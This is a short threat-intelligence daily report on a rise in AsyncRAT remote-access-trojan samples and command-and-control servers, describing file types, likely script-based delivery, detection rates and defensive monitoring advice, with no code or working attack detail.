Daily Summary
New AsyncRAT samples rose 50% above the 7-day average, indicating a significant surge in activity. This spike is accompanied by a substantial expansion of command-and-control (C2) infrastructure, with 100 new servers identified.
New Samples Detected
The sample set is dominated by executable files (.exe), comprising 11 of the 15 new samples. A notable shift is the presence of scripting payloads (.bat, .js, .vbs), which together make up over a quarter of today’s detections. This suggests attackers are using script-based droppers to download or deploy the final RAT binary.
Distribution Methods
The file type mix points to a multi-stage delivery strategy. The scripting files (.js, .vbs) are likely delivered via phishing emails or malicious downloads, executing to fetch and run the .exe payloads. The .bat files may be used for post-exploitation tasks or to disable security controls prior to RAT installation.
Detection Rate
Current variants show moderate detection rates by aggregate AV engines. However, the new scripting components, particularly the .js and .vbs files, exhibit lower detection scores, indicating these initial delivery vectors may be successfully evading signature-based defenses.
C2 Infrastructure
The addition of 100 new C2 servers represents a major infrastructure rollout, far exceeding the typical daily volume. This scale suggests preparation for a large-scale campaign or the migration to fresh infrastructure to evade takedowns. No clear geographic pattern is evident from the new server data.
7-Day Trend
Today’s sharp increase in both samples and C2 servers breaks a period of relatively steady activity observed over the past week, signaling a potential new campaign initiation.
Security Analysis
The current activity mirrors the pattern of large-scale, commodity AsyncRAT campaigns targeting broad victim sets rather than precision attacks. The non-obvious tactic is the use of simple, overlooked scripting languages (.vbs, .bat) as the first stage, bypassing controls focused on executable files. Defenders should prioritize enhancing logging and monitoring for the execution of these script types, particularly from user directories or temporary folders, as a key detection point for early campaign activity.